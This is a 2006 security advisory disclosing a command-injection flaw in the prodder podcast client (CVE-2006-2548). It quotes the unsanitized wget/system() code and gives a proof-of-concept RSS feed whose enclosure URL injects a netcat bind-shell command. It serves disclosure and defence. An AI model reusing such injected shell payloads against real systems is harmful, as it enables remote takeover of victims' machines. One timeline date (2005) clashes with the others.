Prodder Remote Arbitrary Command Execution

RedTeam identified a security flaw in prodder which makes it possible for a malicious podcast server to execute arbitrary shell commands on the victim’s client.

Details

• Product: Prodder
• Affected Versions: All versions up to prodder-0.4
• Fixed Versions: prodder-0.5
• Vulnerability Type: Remote arbitrary command execution
• Security-Risk: high
• Vendor-URL: http://prodder.sourceforge.net/
• Vendor-Status: informed, fixed
• Advisory-URL: https://www.redteam-pentesting.de/advisories/rt-sa-2006-002
• Advisory-Status: public
• CVE: CVE-2006-2548
• CVE-URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2548

Introduction

Prodder is a command-line based Podcast client (or aggregator, receiver, doohickey) written in Perl that runs on just about any nx system. It implements a few very useful features that are lacking in many of the existing tools, while remaining simple and light-weight.

(from prodder homepage)

Podcasting is the distribution of multimedia files over the internet. Normally, a server is providing an RSS or Atom XML feed describing where to get the multimedia files. The client parses the feed and may then download the desired files.

More Details

When prodder is used to fetch a podcast, prodder will extract the URL of the audio-file from the XML-file the server provides. Prodder then uses Wget to fetch the file. The source code looks as follows:

[…] 446 # Actually get the file 447 my $wget_cmd = “wget -qc -a ‘$conf{’errorfile’}’ " 448 . “–tries=3 –timeout=20 –random-wait ‘$enc_url’ -P ‘$outdir’”; 449 450 # Background the wgets if needed - this will assume 451 # the downloads dont fail (once they’ve started) 452 $wget_cmd .= " –background” if $conf{‘background’}; 453 454 455 456 print “Fetching item ($enc_url)… “; 457 if (! system($wget_cmd)) […]

Unfortunately, $enc_url which holds the URL in line 448 is never properly sanitized, so it is possible to include arbitrary shell commands in the URL which will then be executed using system() (see line 457).

Proof of Concept

A minimal malicious server rss feed may look as follows:

<?xml version=“1.0” encoding=“UTF-8”?> <?xml-stylesheet type=“text/xsl”?> <rss version=“2.0”> <channel> <title>RedTeam Pentesting Example Malicious Server Feed</title>

<item>
<enclosure url="http://www.example.com/example.mp3’; nc -e /bin/sh -l -p 1337 & ‘;#’”
length=“241734” type=“audio/mpeg” />

</item>

</channel> </rss>

The URL above will open port 1337 via netcat on the victim’s computer and bind a shell to it. This is just one example of how to exploit the vulnerability, as arbitrary commands can be included in the URL, but it should illustrate the point.

Workaround

Do not use prodder with untrusted servers.

Fix

Upgrade to prodder-0.5 immediately (http://prdownloads.sourceforge.net/prodder/prodder-0.5.tgz?download).

Security Risk

High, because arbitrary shell commands can be executed on the victim’s computer with the privileges of prodder (normally the user’s privileges).

History

• 2006-05-18 Discovery of the problem
• 2006-05-19 Notification of the author
• 2006-05-19 Initial response of the author
• 2006-05-20 Fixed version of prodder is released
• 2005-05-22 Public release of the advisory without CVE
  number because of public release by the author. CVE will be appended when available.
• 2006-05-24 CVE added
• 2009-05-08 Updated Advisory URL

RedTeam

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories.

More information about RedTeam can be found at https://www.redteam-pentesting.de.